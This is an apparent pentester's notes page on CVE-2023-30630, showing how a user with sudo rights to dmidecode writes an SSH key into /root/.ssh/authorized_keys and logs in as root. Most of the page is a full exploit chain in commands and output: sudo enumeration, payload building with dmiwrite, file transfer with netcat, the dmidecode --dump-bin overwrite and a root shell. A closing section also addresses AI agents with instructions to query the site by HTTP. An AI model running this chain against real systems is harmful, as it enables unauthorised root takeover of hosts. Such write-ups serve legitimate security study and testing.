# Dmidecode - CVE-2023-30630
Dmidecode is a tool for dumping a computers DMI (SMBIOS) table contents in a human-readable format. This table contains a description of the systems hardware components, as well as other useful pieces of information such as serial numbers and BIOS revisions.
With root permissions to `dmidecode` a low privileged user can use the application maliciously to **escalate its privileges** to root through a **file write vulnerability**.
{% hint style="info" %}
* Newly created files through `dmidecode` will have the owner `root`. If you instead write to an already existing file, the content will be overwritten but the privileges will be honored.
* You are **not** able to create directories with `dmidecode`. If you plan to privesc through `.ssh/authorized_key` the directory needs to exist.
* To privesc through `/root/.ssh/authorized_keys`, `PermitRootLogin` must be enabled in `/etc/ssh/sshd_config`
* `dmidecode` will add junk at the beginning of the file, this is not visible with `cat` but you'll see it with `vi/vim`. To circumvent this write your ssh-key on row 2 or below.
* `dmidecode` version 3.3 has a bug that SEGFAULTs the program when trying to exploit, however this is again fixed for version 3.4. This exploit will work on **all versions between 1.8 and 3.4, except 3.3**.
{% endhint %}
Use the tool [`dmiwrite` ](https://github.com/adamreiser/dmiwrite)to build malicious payload.
```bash
## Find privesc vector on victim host
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
(root) NOPASSWD: /usr/sbin/dmidecode
## Verify dmidecode version
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2
## Create payload on local attack machine. Note that first line will be destroyed with random characters, so the correct payload needs to be on line 2 or below.
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]
## Build payload with dmiwrite
➜ ./dmiwrite authorized_keys authorized_keys.dmi
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
Setting checksum: memset(buf+30, 130, 1);
Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.
## Upload file to victim
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi
## Write file
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.
# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory
## Login as root
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)
```
Image illustrating junk at the beginning of file
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/dmidecode-cve-2023-30630.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.